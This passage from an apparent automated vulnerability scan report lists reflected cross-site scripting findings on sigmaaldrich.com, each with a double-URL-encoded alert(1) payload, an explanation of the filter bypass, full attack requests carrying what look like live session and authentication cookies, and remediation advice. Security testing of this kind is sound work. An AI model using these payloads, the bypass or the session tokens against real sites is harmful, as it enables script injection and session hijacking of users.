                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/a12be";alert(1)//d73e7e9ff3b","E404") ;
   </script>
...[SNIP]...

1.569. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/nutrition-research.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed503%2522%253balert%25281%2529%252f%252f10165721370 was submitted in the REST URL parameter 1. This input was echoed as ed503";alert(1)//10165721370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceed503%2522%253balert%25281%2529%252f%252f10165721370/nutrition-research.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceed503";alert(1)//10165721370/nutrition-research.html","E404") ;
   </script>
...[SNIP]...

1.570. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/nutrition-research.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72705%2522%253balert%25281%2529%252f%252ffbce60f2f74 was submitted in the REST URL parameter 2. This input was echoed as 72705";alert(1)//fbce60f2f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/72705%2522%253balert%25281%2529%252f%252ffbce60f2f74 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:33 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/72705";alert(1)//fbce60f2f74","E404") ;
   </script>
...[SNIP]...

1.571. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/proteomics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecf7b%2522%253balert%25281%2529%252f%252f103fd00e32e was submitted in the REST URL parameter 1. This input was echoed as ecf7b";alert(1)//103fd00e32e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceecf7b%2522%253balert%25281%2529%252f%252f103fd00e32e/proteomics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28932
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceecf7b";alert(1)//103fd00e32e/proteomics.html","E404") ;
   </script>
...[SNIP]...

1.572. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/proteomics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faa15%2522%253balert%25281%2529%252f%252ff8c67b482ac was submitted in the REST URL parameter 2. This input was echoed as faa15";alert(1)//f8c67b482ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/faa15%2522%253balert%25281%2529%252f%252ff8c67b482ac HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/faa15";alert(1)//f8c67b482ac","E404") ;
   </script>
...[SNIP]...

1.573. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/sigma-transgenics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa0f7%2522%253balert%25281%2529%252f%252fdbe768df677 was submitted in the REST URL parameter 1. This input was echoed as aa0f7";alert(1)//dbe768df677 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceaa0f7%2522%253balert%25281%2529%252f%252fdbe768df677/sigma-transgenics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceaa0f7";alert(1)//dbe768df677/sigma-transgenics.html","E404") ;
   </script>
...[SNIP]...

1.574. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/sigma-transgenics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb5b4%2522%253balert%25281%2529%252f%252fec1a260ed13 was submitted in the REST URL parameter 2. This input was echoed as cb5b4";alert(1)//ec1a260ed13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

